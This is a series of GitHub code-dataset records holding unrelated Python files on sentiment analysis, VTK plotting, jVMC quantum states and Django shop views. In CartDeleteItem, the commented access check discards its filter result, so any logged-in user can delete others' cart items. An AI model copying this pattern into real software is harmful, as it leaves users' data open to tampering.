        cur.execute(update_position)\n        conn.commit()\n        count = cur.rowcount\n        print(count)\n\nexcept psycopg2.Error as e:\n    print(\"An error occurred while querying: \", e)\nfinally:\n    conn.close()","repo_name":"thygolem/indoorQt","sub_path":"db/consulta.py","file_name":"consulta.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33383662030","text":"from sklearn.metrics import classification_report\nfrom textblob_fr import PatternTagger, PatternAnalyzer\nfrom textblob import Blobber\nfrom tqdm import tqdm\nfrom pandas.core.frame import DataFrame\nimport pandas as pd\nimport re\nfrom spacy.lang.fr.stop_words import STOP_WORDS\n\n\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\ndef cleanup(text):\n    text = text.lower()\n\n    Word_Tok = []\n    for word in re.sub(r\"\\W\", \" \", text).split():\n        Word_Tok.append(word)\n\n    stop_words = set(STOP_WORDS)\n    # Keep French negation words out of the stop list (note the comma after 'non':\n    # the original 'non' 'pas' silently concatenated into the single token 'nonpas').\n    deselect_stop_words = ['n', 'ne', 'non', 'pas', 'plus',\n                           'personne', 'aucun', 'ni', 'aucune', 'rien']\n    for w in deselect_stop_words:\n        if w in stop_words:\n            stop_words.remove(w)\n        else:\n            continue\n\n    filteredComment = [w for w in Word_Tok if not (\n        (w in stop_words) or (len(w) == 1))]\n\n    return ' '.join(filteredComment)\n\n\ndef getClasseFromComment(text):\n    polarity = tb(cleanup(text)).sentiment[0]\n    if polarity > 0:\n        return \"Positive\"\n    if polarity < 0:\n        return \"Negative\"\n    return \"Neutral\"\n\n\ndef getClasseFromNote(note):\n    if note > 3:\n        return \"Positive\"\n    if note < 2.5:\n        return \"Negative\"\n    return \"Neutral\"\n\n\ndef analyseMovie(idFilm):\n    df = pd.read_csv(f\"data/{idFilm}.csv\")\n    y_true = df[\"Note\"].apply(getClasseFromNote)\n    y_pred = df[\"Commentaire\"].apply(getClasseFromComment)\n    return classification_report(y_true, y_pred, output_dict=True), y_pred.value_counts()\n\n\ndef analyseAll():\n    df = pd.read_csv(\"data/data.csv\")\n    Note_, ClasseN_, ClasseC_, Difference_, PrecisionP_, PrecisionN_, PrecisionNEU_, PrecisionG_, PrecisionW_ = [\n    ], [], [], [], [], [], [], [], []\n    for index, id in tqdm(df[\"ID\"].items(), total=len(df.index), desc='Analyse'):\n        report, count = analyseMovie(id)\n        # value_counts() is ordered by frequency and may omit absent classes, so\n        # look the counts up by label instead of unpacking them positionally.\n        nbrPos = count.get(\"Positive\", 0)\n        nbrNeg = count.get(\"Negative\", 0)\n        nbrNeu = count.get(\"Neutral\", 0)\n\n        Note_.append(round(((nbrPos*1.3 - nbrNeg - nbrNeu*0.1) /\n                            (nbrPos*1.3 + nbrNeg + nbrNeu*0.1)) * 5, 2))\n        ClasseN_.append(getClasseFromNote(Note_[index]))\n        if(nbrPos > nbrNeg*3.6):\n            ClasseC_.append(\"Positive\")\n        elif(nbrPos < nbrNeg*2.1):\n            ClasseC_.append(\"Negative\")\n        else:\n            ClasseC_.append(\"Neutral\")\n        Difference_.append(round(Note_[index] - df[\"Note\"][index], 2))\n        PrecisionP_.append(round(report[\"Positive\"][\"precision\"]*100, 2))\n        PrecisionN_.append(round(report[\"Negative\"][\"precision\"]*100, 2))\n        PrecisionNEU_.append(round(report[\"Neutral\"][\"precision\"]*100, 2))\n        PrecisionG_.append(round(report[\"macro avg\"][\"precision\"]*100, 2))\n        PrecisionW_.append(round(report[\"weighted avg\"][\"precision\"]*100, 2))\n
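    # Attach the per-movie metric lists collected above as columns of the summary frame.\n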
df[\"Precision Neutral\"] = PrecisionNEU_\n df[\"Precision Global\"] = PrecisionG_\n df[\"Precision Weighted\"] = PrecisionW_\n df.to_csv(\"data/analysis.csv\", index=False, encoding='utf-8')\n return df\n\n\ndef classeStats(df, methode):\n report = classification_report(df[\"Classe\"], df[methode], output_dict=True)\n return {\"Precision Positive\": round(report['Positive']['precision']*100, 2),\n \"Precision Neutral\": round(report['Neutral']['precision']*100, 2),\n \"Precision Negative\": round(report['Negative']['precision']*100, 2),\n \"Precision Global\": round(report['macro avg']['precision']*100, 2),\n \"Precision Weighted\": round(report['weighted avg']['precision']*100, 2)}\n\n\ndef analyseResults(df):\n # Stats de determination des classes des commentaires\n stats = DataFrame({\"Precision Positive\": [df[\"Precision Positive\"].mean(), df[\"Precision Positive\"].median(), df[\"Precision Positive\"].min(), df[\"Precision Positive\"].max()],\n \"Precision Negative\": [df[\"Precision Negative\"].mean(), df[\"Precision Negative\"].median(), df[\"Precision Negative\"].min(), df[\"Precision Negative\"].max()],\n \"Precision Neutral\": [df[\"Precision Neutral\"].mean(), df[\"Precision Neutral\"].median(), df[\"Precision Neutral\"].min(), df[\"Precision Neutral\"].max()],\n \"Precision Global\": [df[\"Precision Global\"].mean(), df[\"Precision Global\"].median(), df[\"Precision Global\"].min(), df[\"Precision Global\"].max()],\n \"Precision Weighted\": [df[\"Precision Weighted\"].mean(), df[\"Precision Weighted\"].median(), df[\"Precision Weighted\"].min(), df[\"Precision Weighted\"].max()],\n \"Difference Note\": [df[\"Difference Note\"].abs().mean(), df[\"Difference Note\"].abs().median(), df[\"Difference Note\"].abs().min(), df[\"Difference Note\"].abs().max()]},\n index=['Moyenne',\n 'Median',\n 'Min',\n 'Max'])\n stats.to_csv(\"data/statsComment.csv\")\n print(\"\\nStatistiques sur la determination de la classe des commentaires:\\n\", stats)\n\n # Stats de determination des classes des films\n statsClasse = DataFrame([classeStats(df, \"Classe Estimé Note\"), classeStats(df, \"Classe Estimé Commentaires\")],\n index=[\"Classe Estimé Note\", \"Classe Estimé Commentaires\"])\n statsClasse.to_csv(\"data/statsClasse.csv\")\n print(\"\\nStatistiques sur la determination de la classe des films:\\n\", statsClasse)\n\n\nif __name__ == \"__main__\":\n df = analyseAll()\n print(df[[\"Nom\", \"Nombre Commentaires\", \"Note\", \"Note Estimé\", \"Difference Note\", \"Classe\",\n \"Classe Estimé Note\", \"Classe Estimé Commentaires\", \"Precision Global\", \"Precision Weighted\"]])\n analyseResults(df)\n","repo_name":"QuentinBeauchet/ProjetTATIA","sub_path":"analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29172351360","text":"\"\"\"https://github.com/kujason/scene_vis\"\"\"\n\nimport numpy as np\nimport vtk\n\n\nclass VtkPlane(vtk.vtkActor):\n \"\"\"Axis aligned plane\"\"\"\n\n def __init__(self):\n super().__init__()\n self.vtk_plane_source = vtk.vtkPlaneSource()\n self.vtk_plane_mapper = vtk.vtkPolyDataMapper()\n\n def set_plane(self, axes, offset, extents: np.ndarray):\n \"\"\"Calculates 3 points for plane visualization\n based on the provided ground plane\n\n Args:\n axes: \"xy\", \"xz\", \"yz\"\n offset: Offset distance\n extents: Extents along the plane for visualization (2, 2)\n \"\"\"\n\n extents = np.asarray(extents)\n assert extents.shape == (2, 
2)\n\n min_i = extents[0][0]\n max_i = extents[0][1]\n min_j = extents[1][0]\n max_j = extents[1][1]\n\n if axes == \"xy\":\n plane_points = np.asarray(\n [[min_i, min_j, offset], [max_i, min_j, offset], [min_i, max_j, offset]]\n )\n elif axes == \"xz\":\n plane_points = np.asarray(\n [[min_i, offset, min_j], [max_i, offset, min_j], [min_i, offset, max_j]]\n )\n elif axes == \"yz\":\n plane_points = np.asarray(\n [[offset, min_i, min_j], [offset, max_i, min_j], [offset, min_i, max_j]]\n )\n else:\n raise ValueError(\"Invalid axes\", axes)\n\n self.vtk_plane_source.SetOrigin(*plane_points[0])\n self.vtk_plane_source.SetPoint1(*plane_points[1])\n self.vtk_plane_source.SetPoint2(*plane_points[2])\n\n self.vtk_plane_source.Update()\n\n vtk_plane_poly_data = self.vtk_plane_source.GetOutput()\n self.vtk_plane_mapper.SetInputData(vtk_plane_poly_data)\n\n self.SetMapper(self.vtk_plane_mapper)\n\n def set_transform(self, transform):\n self.vtk_transform = vtk.vtkTransform()\n self.vtk_transform.SetMatrix(transform.flatten())\n self.SetUserTransform(self.vtk_transform)\n","repo_name":"ljj7975/3d_object_detection","sub_path":"lib/scene_vis/src/scene_vis/vtk_wrapper/vtk_plane.py","file_name":"vtk_plane.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16302414801","text":"import jax\nfrom jax.config import config\nconfig.update(\"jax_enable_x64\", True)\nfrom jax import jit, grad, vmap\nfrom jax import numpy as jnp\nfrom jax import random\nfrom jax.tree_util import tree_flatten, tree_unflatten, tree_map\nfrom jax.flatten_util import ravel_pytree\nimport flax\nimport flax.linen as nn\nfrom flax.core.frozen_dict import freeze, unfreeze\nimport numpy as np\n\nimport jVMC\nimport jVMC.global_defs as global_defs\nfrom jVMC.nets import CpxRBM\nfrom jVMC.nets import RBM\nimport jVMC.mpi_wrapper as mpi\n\nfrom functools import partial\nimport collections\nimport time\nfrom math import isclose\n\nfrom typing import Sequence\n\n\ndef create_batches(configs, b):\n\n append = b * ((configs.shape[0] + b - 1) // b) - configs.shape[0]\n pads = [(0, append), ] + [(0, 0)] * (len(configs.shape) - 1)\n\n return jnp.pad(configs, pads).reshape((-1, b) + configs.shape[1:])\n\n\ndef eval_batched(batchSize, fun, s):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: fun(y), in_axes=(0,))(x)\n\n res = jax.lax.scan(scan_fun, None, jnp.array(sb))[1].reshape((-1,))\n\n return res[:s.shape[0]]\n\n\ndef flat_gradient(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_flatten(tree_map(lambda x: x.ravel(), gr))[0]\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_flatten(tree_map(lambda x: x.ravel(), gi))[0]\n return jnp.concatenate(gr) + 1.j * jnp.concatenate(gi)\n\ndef flat_gradient_cpx_nonholo(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_flatten(tree_map(lambda x: [jnp.real(x.ravel()), -jnp.imag(x.ravel())], gr))[0]\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_flatten(tree_map(lambda x: [jnp.real(x.ravel()), -jnp.imag(x.ravel())], gi))[0]\n return jnp.concatenate(gr) + 1.j * jnp.concatenate(gi)\n\n\ndef flat_gradient_real(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_flatten(tree_map(lambda x: x.ravel(), g))[0]\n return 
jnp.concatenate(g)\n\ndef flat_gradient_holo(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_flatten(tree_map(lambda x: [x.ravel(), 1.j*x.ravel()], g))[0]\n return jnp.concatenate(g)\n\ndef dict_gradient(fun, params, arg):\n gr = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n gr = tree_map(lambda x: x.ravel(), gr)\n gi = grad(lambda p, y: jnp.imag(fun.apply(p, y)))(params, arg)[\"params\"]\n gi = tree_map(lambda x: x.ravel(), gi)\n return tree_map(lambda x,y: x + 1.j*y, gr, gi)\n\n\ndef dict_gradient_real(fun, params, arg):\n g = grad(lambda p, y: jnp.real(fun.apply(p, y)))(params, arg)[\"params\"]\n g = tree_map(lambda x: x.ravel(), g)\n return g\n\n\nclass NQS:\n \"\"\"Wrapper class providing basic functionality of variational states.\n \n This class can operate in two modi:\n #. Single-network ansatz\n Quantum state of the form :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_\\\\theta(s))`, \\\n where the network :math:`r_\\\\theta` is\n a) holomorphic, i.e., parametrized by complex valued parameters :math:`\\\\vartheta`.\n b) non-holomorphic, i.e., parametrized by real valued parameters :math:`\\\\theta`.\n #. Two-network ansatz\n Quantum state of the form \n :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_{\\\\theta_r}(s)+i\\\\varphi_{\\\\theta_\\\\phi}(s))` \\\n with an amplitude network :math:`r_{\\\\theta_{r}}` and a phase network \\\n :math:`\\\\varphi_{\\\\theta_\\phi}` \\\n parametrized by real valued parameters :math:`\\\\theta_r,\\\\theta_\\\\phi`.\n\n Initializer arguments:\n * ``net``: Variational network.\n A network has to be registered as pytree node and provide \\\n a ``__call__`` function for evaluation.\n It is expected that the network is of type ``jVMC.nets.sym_wrapper.SymNet``.\n If the network is composed of two networks, the correct wrapping structure is\n ``jVMC.nets.sym_wrapper.SymNet(jVMC.nets.two_nets_wrapper.TwoNets)``.\n * ``batchSize``: Batch size for batched network evaluation. Choice \\\n of this parameter impacts performance: with too small values performance \\\n is limited by memory access overheads, too large values can lead \\\n to \"out of memory\" issues.\n * ``seed``: Seed for the PRNG to initialize the network parameters.\n \"\"\"\n\n def __init__(self, net, \n batchSize=1000, \n seed=1234, \n orbit=None, \n avgFun=jVMC.nets.sym_wrapper.avgFun_Coefficients_Exp):\n \"\"\"Initializes NQS class.\n \n This class can operate in two modi:\n #. Single-network ansatz\n Quantum state of the form :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_\\\\theta(s))`, \\\n where the network :math:`r_\\\\theta` is\n a) holomorphic, i.e., parametrized by complex valued parameters :math:`\\\\vartheta`.\n b) non-holomorphic, i.e., parametrized by real valued parameters :math:`\\\\theta`.\n #. Two-network ansatz\n Quantum state of the form \n :math:`\\psi_\\\\theta(s)\\equiv\\exp(r_{\\\\theta_r}(s)+i\\\\varphi_{\\\\theta_\\\\phi}(s))` \\\n with an amplitude network :math:`r_{\\\\theta_{r}}` and a phase network \\\n :math:`\\\\varphi_{\\\\theta_\\phi}` \\\n parametrized by real valued parameters :math:`\\\\theta_r,\\\\theta_\\\\phi`.\n Args: \n * ``net``: Variational network or tuple of networks.\n A network has to be registered as pytree node and provide \\\n a ``__call__`` function for evaluation. 
\\\n If a tuple of two networks is given, the first is used for the logarithmic \\\n amplitude and the second for the phase of the wave function coefficient.\n * ``batchSize``: Batch size for batched network evaluation. Choice \\\n of this parameter impacts performance: with too small values performance \\\n is limited by memory access overheads, too large values can lead \\\n to \"out of memory\" issues.\n * ``seed``: Seed for the PRNG to initialize the network parameters.\n * ``orbit``: Orbit which defining the symmetry operations (instance of ``util.symmetries.LatticeSymmetry``). \\\n If this argument is given, the wave function is symmetrized to be invariant under symmetry operations.\n * ``avgFun``: Reduction operation for the symmetrization.\n \"\"\"\n\n # The net arguments have to be instances of flax.nn.Model\n self.realNets = False\n self.holomorphic = False\n self.flat_gradient_function = flat_gradient_real\n self.dict_gradient_function = dict_gradient_real\n\n self.initialized = False\n self.seed = seed\n self.parameters = None\n\n self._isGenerator = False\n if isinstance(net, collections.abc.Iterable):\n net = jVMC.nets.two_nets_wrapper.TwoNets(net)\n if not orbit is None:\n net = jVMC.nets.sym_wrapper.SymNet(net=net, orbit=orbit, avgFun=avgFun)\n if \"sample\" in dir(net):\n if callable(net.sample):\n self._isGenerator = True\n self.net = net\n\n self.batchSize = batchSize\n\n # Need to keep handles of jit'd functions to avoid recompilation\n self._eval_net_pmapd = global_defs.pmap_for_my_devices(self._eval, in_axes=(None, None, 0, None), static_broadcasted_argnums=(0, 3))\n self._get_gradients_pmapd = global_defs.pmap_for_my_devices(self._get_gradients, in_axes=(None, None, 0, None, None), static_broadcasted_argnums=(0, 3, 4))\n self._append_gradients = global_defs.pmap_for_my_devices(lambda x, y: jnp.concatenate((x[:, :], 1.j * y[:, :]), axis=1), in_axes=(0, 0))\n self._get_gradients_dict_pmapd = global_defs.pmap_for_my_devices(self._get_gradients, in_axes=(None, None, 0, None, None), static_broadcasted_argnums=(0, 3, 4))\n self._append_gradients_dict = global_defs.pmap_for_my_devices(lambda x, y: tree_map(lambda a,b: jnp.concatenate((a[:, :], 1.j * b[:, :]), axis=1), x, y), in_axes=(0, 0))\n self._sample_jitd = {}\n\n # ** end def __init__\n\n\n def init_net(self, s):\n\n if not self.initialized:\n \n self.parameters = self.net.init(jax.random.PRNGKey(self.seed), s[0,0,...])\n self.realParams = False\n dtypes = [a.dtype for a in tree_flatten(self.parameters)[0]]\n if not all(d == dtypes[0] for d in dtypes):\n raise Exception(\"Network uses different parameter data types. 
This is not supported.\")\n if dtypes[0] == np.single or dtypes[0] == np.double:\n self.realParams = True\n \n # check Cauchy-Riemann condition to test for holomorphicity\n def make_flat(t):\n return jnp.concatenate([p.ravel() for p in tree_flatten(t)[0]])\n grads_r = make_flat( jax.grad(lambda a,b: jnp.real(self.net.apply(a,b)))(self.parameters, s[0,0,...])[\"params\"] )\n grads_i = make_flat( jax.grad(lambda a,b: jnp.imag(self.net.apply(a,b)))(self.parameters, s[0,0,...])[\"params\"] )\n if isclose(jnp.linalg.norm(grads_r - 1.j * grads_i)/grads_r.shape[0], 0.0, abs_tol=1e-14):\n self.holomorphic = True\n self.flat_gradient_function = flat_gradient_holo\n else:\n if self.realParams:\n self.flat_gradient_function = flat_gradient\n self.dict_gradient_function = dict_gradient\n else:\n self.flat_gradient_function = flat_gradient_cpx_nonholo\n\n self.paramShapes = [(p.size, p.shape) for p in tree_flatten(self.parameters[\"params\"])[0]]\n self.netTreeDef = jax.tree_util.tree_structure(self.parameters[\"params\"])\n self.numParameters = jnp.sum(jnp.array([p.size for p in tree_flatten(self.parameters[\"params\"])[0]]))\n\n self.initialized = True\n\n # ** end init_net\n\n\n def __call__(self, s):\n \"\"\"Evaluate variational wave function.\n \n Compute the logarithmic wave function coefficients :math:`\\ln\\psi(s)` for \\\n computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n Logarithmic wave function coefficients :math:`\\ln\\psi(s)`.\n \n :meta public:\n \"\"\"\n\n self.init_net(s)\n\n return self._eval_net_pmapd(self.net, self.parameters, s, self.batchSize)\n\n\n def _eval(self, net, params, s, batchSize):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: net.apply(params, y), in_axes=(0,))(x)\n\n res = jax.lax.scan(scan_fun, None, jnp.array(sb))[1].reshape((-1,))\n\n return res[:s.shape[0]]\n\n # ** end def __call__\n\n\n def _get_gradients(self, net, params, s, batchSize, flat_grad):\n\n sb = create_batches(s, batchSize)\n\n def scan_fun(c, x):\n return c, jax.vmap(lambda y: flat_grad(net, params, y), in_axes=(0,))(x)\n\n g = jax.lax.scan(scan_fun, None, sb)[1]\n\n g = tree_map(lambda x: x.reshape((-1,) + x.shape[2:]), g)\n\n #return g[:s.shape[0]]\n return tree_map(lambda x: x[:s.shape[0]], g)\n\n\n def gradients(self, s):\n \"\"\"Compute gradients of logarithmic wave function.\n \n Compute gradient of the logarithmic wave function coefficients, \\\n :math:`\\\\nabla\\ln\\psi(s)`, for computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n A vector containing derivatives :math:`\\partial_{\\\\theta_k}\\ln\\psi(s)` \\\n with respect to each variational parameter :math:`\\\\theta_k` for each \\\n input configuration :math:`s`.\n \"\"\"\n \n self.init_net(s)\n\n return self._get_gradients_pmapd(self.net, self.parameters, s, self.batchSize, self.flat_gradient_function)\n\n # ** end def gradients\n\n\n def gradients_dict(self, s):\n \"\"\"Compute gradients of logarithmic wave function and return them as dictionary.\n \n Compute gradient of the logarithmic wave function coefficients, \\\n :math:`\\\\nabla\\ln\\psi(s)`, for computational configurations :math:`s`.\n \n Args:\n * ``s``: Array of computational basis states.\n Returns:\n A dictionary containing derivatives :math:`\\partial_{\\\\theta_k}\\ln\\psi(s)` \\\n with respect to each variational parameter :math:`\\\\theta_k` for each \\\n input configuration :math:`s`.\n \"\"\"\n \n 
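# Make sure the network parameters are initialized before taking gradients.\n        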
self.init_net(s)\n\n # Here we need to add the treatment for the complex non-holomorphic case\n gradOut = self._get_gradients_dict_pmapd(self.net, self.parameters, s, self.batchSize, self.dict_gradient_function)\n\n if self.holomorphic:\n return self._append_gradients_dict(gradOut, gradOut)\n\n return gradOut\n\n # ** end gradients_dict\n\n\n def grad_dict_to_vec_map(self):\n\n PTreeShape = []\n start = 0\n P = jnp.arange(2*self.numParameters)\n for s in self.paramShapes:\n # Here we need to add the treatment for the complex non-holomorphic case\n if self.holomorphic:\n PTreeShape.append( ( P[start:start + 2*s[0]]) )\n start += 2*s[0]\n else:\n PTreeShape.append(P[start:start + s[0]])\n start += s[0]\n \n # Return unflattened parameters\n return tree_unflatten(self.netTreeDef, PTreeShape)\n\n\n def get_sampler_net(self):\n \"\"\"Get real part of NQS and current parameters\n\n This function returns a function that evaluates the real part of the NQS,\n :math:`\\\\text{Re}(\\log\\psi(s))`, and the current parameters.\n\n Returns:\n Real part of the NQS and current parameters\n \"\"\"\n\n evalReal = lambda p,x: jnp.real( self.net.apply(p,x) )\n if \"eval_real\" in dir(self.net):\n if callable(self.net.eval_real):\n evalReal = lambda p,x: jnp.real( self.net.apply(p,x,method=self.net.eval_real) )\n\n return evalReal, self.parameters\n\n # ** end def get_sampler_net\n\n def sample(self, numSamples, key, parameters=None):\n\n if self._isGenerator:\n net, params = self.net, self.parameters\n\n if parameters is not None:\n params = parameters\n\n numSamplesStr = str(numSamples)\n\n # check whether _get_samples is already compiled for given number of samples\n if not numSamplesStr in self._sample_jitd:\n self._sample_jitd[numSamplesStr] = global_defs.pmap_for_my_devices(lambda p, n, x: net.apply(p, n, x, method=net.sample),\n static_broadcasted_argnums=(1,), in_axes=(None, None, 0))\n\n samples = self._sample_jitd[numSamplesStr](params, int(numSamples), key)\n\n return samples\n\n return None\n\n # ** end def sample\n\n def _sample(self, net, params, numSamples, key):\n\n return net.apply(params, numSamples, key, method=net.sample)\n\n\n def update_parameters(self, deltaP):\n \"\"\"Update variational parameters.\n \n Sets new values of all variational parameters by adding given values.\n If parameters are not initialized, parameters are set to ``deltaP``.\n \n Args:\n * ``deltaP``: Values to be added to variational parameters.\n \"\"\"\n\n if not self.initialized:\n self.set_parameters(deltaP)\n\n # Compute new parameters\n newParams = jax.tree_util.tree_map(\n jax.lax.add, self.params,\n self._param_unflatten(deltaP)\n )\n\n # Update model parameters\n self.params = newParams\n\n # ** end def update_parameters\n\n\n def set_parameters(self, P):\n \"\"\"Set variational parameters.\n \n Sets new values of all variational parameters.\n \n Args:\n * ``P``: New values of variational parameters.\n \"\"\"\n\n if not self.initialized:\n raise RuntimeError(\"Error in NQS.set_parameters(): Network not initialized. 
Evaluate net on example input for initialization.\")\n\n        # Update model parameters\n        if isinstance(P, flax.core.frozen_dict.FrozenDict):\n            self.params = P\n        else:\n            self.params = self._param_unflatten(P)\n\n    # ** end def set_parameters\n\n\n    def _param_unflatten(self, P):\n\n        # Reshape parameter update according to net tree structure\n        PTreeShape = []\n        start = 0\n        for s in self.paramShapes:\n            if not self.realParams:\n                PTreeShape.append( ( P[start:start + s[0]] + 1.j * P[start + s[0]:start + 2*s[0]]).reshape(s[1]) )\n                start += 2*s[0]\n            else:\n                PTreeShape.append(P[start:start + s[0]].reshape(s[1]))\n                start += s[0]\n        \n        # Return unflattened parameters\n        return tree_unflatten(self.netTreeDef, PTreeShape)\n\n    # ** end def _param_unflatten\n\n\n    def get_parameters(self):\n        \"\"\"Get variational parameters.\n        \n        Returns:\n            Array holding current values of all variational parameters.\n        \"\"\"\n\n        if not self.initialized:\n\n            return None\n\n\n        if not self.realParams:\n            paramOut = jnp.concatenate([jnp.concatenate([p.ravel().real, p.ravel().imag]) for p in tree_flatten(self.params)[0]])\n        else:\n            paramOut = jnp.concatenate([p.ravel() for p in tree_flatten(self.params)[0]])\n\n        return paramOut\n\n    # ** end def get_parameters\n\n    @property\n    def is_generator(self):\n        return self._isGenerator\n\n    @property\n    def params(self):\n        if self.initialized:\n            return self.parameters[\"params\"]\n        return None\n\n    @params.setter\n    def params(self, val):\n        # Replace 'params' in parameters by `val`\n        self.parameters = freeze({\n            **unfreeze(self.parameters.pop(\"params\")[0]),\n            \"params\": unfreeze(val)\n        })\n\n","repo_name":"markusschmitt/vmc_jax","sub_path":"jVMC/vqs.py","file_name":"vqs.py","file_ext":"py","file_size_in_byte":18600,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"31"} +{"seq_id":"36554308372","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.http import require_POST\n\nfrom django.views.generic import ListView, DetailView, DeleteView\n\nfrom shop.forms import AddQuantityForm\nfrom shop.models import Product, Order, OrderItem\n\n\nclass ProductsListView(ListView):\n    model = Product\n    template_name = 'shop/shop.html'\n\n\nclass ProductsDetailView(DetailView):\n    model = Product\n    template_name = 'shop/shop-single.html'\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef add_item_to_cart(request, pk):\n    if request.method == 'POST':\n        quantity_form = AddQuantityForm(request.POST)\n        if quantity_form.is_valid():\n            quantity = quantity_form.cleaned_data['quantity']\n            if quantity:\n                cart = Order.get_cart(request.user)\n                product = get_object_or_404(Product, pk=pk)\n                cart.orderitem_set.create(product=product,\n                                          quantity=quantity,\n                                          price=product.price)\n                cart.save()\n                return redirect('cart_view')\n            else:\n                pass\n    return redirect('shop')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef cart_view(request):\n    cart = Order.get_cart(request.user)\n    items = cart.orderitem_set.all()\n    context = {\n        'cart': cart,\n        'items': items,\n    }\n    return render(request, 'shop/cart.html', context)\n\n\n@method_decorator(login_required, name='dispatch')\nclass CartDeleteItem(DeleteView):\n    model = OrderItem\n    template_name = 'shop/cart.html'\n    success_url = reverse_lazy('cart_view')\n\n    # Access check\n    def 
get_queryset(self):\n qs = super().get_queryset()\n qs.filter(order__user=self.request.user)\n return qs\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef make_order(request):\n cart = Order.get_cart(request.user)\n cart.make_order()\n return redirect('shop')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef history_page(request):\n history = Order.get_history(request.user)\n context = {\n 'history': history,\n }\n return render(request, 'shop/history.html', context)\n\n\ndef male_category_page(request):\n category = Product.get_all_by_male_cat(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/male_cat.html', context)\n\n\ndef female_category_page(request):\n category = Product.get_all_by_female_cat(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/female_cat.html', context)\n\n\ndef top_category_page(request):\n category = Product.get_all_by_TOP(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/top_cat.html', context)\n\n\ndef bottom_category_page(request):\n category = Product.get_all_by_BOTTOM(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/bottom_cat.html', context)\n\n\ndef accessories_category_page(request):\n category = Product.get_all_by_ACCESSORIES(request.user)\n context = {\n 'category': category,\n }\n return render(request, 'shop/accessories_cat.html', context)\n\n\ndef order_list_increase(request):\n category = Product.get_by_increase_price(request.user)\n context = {\n 'category': category\n }\n return render(request, 'shop/increase_price_page.html', context)\n\n\ndef order_list_decline(request):\n category = Product.get_by_decline_price(request.user)\n context = {\n 'category': category\n }\n return render(request, 'shop/decline_price.html', context)\n\n\ndef favorites(request):\n favorite_products = Product.objects.filter(is_favorite=True)\n context = {'favorite_products': favorite_products}\n return render(request, 'shop/favorites.html', context)\n\ndef add_to_favorite(request, prod_id):\n product = Product.objects.get(id=prod_id)\n if product.is_favorite == True:\n product.is_favorite = False\n product.save()\n elif product.is_favorite == False:\n product.is_favorite = True\n product.save()\n return redirect('shop')\n\n# product = Product.objects.get(id=prod_id)\n# product.is_favorite = True\n# product.save()\n# return redirect('shop')","repo_name":"KnightOfMelons/Shop-with-Django","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7058950720","text":"import argparse\nfrom os.path import abspath, dirname\n\n\ndef get_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--no_tokenize\",\n action='store_true',\n help=\"Do not do word level tokenization, only return full sentence\",\n )\n parser.add_argument(\n \"--gold_directory\",\n type=str,\n default=\"/dropbox/22-23/575x/Data/models/devtest\",\n help=\"Path to the directory containing gold summary\",\n )\n parser.add_argument(\n \"--docset\",\n type=str,\n default=\"A\",\n help=\"Select which docset to parse\",\n )\n args, unknown = parser.parse_known_args()\n return 
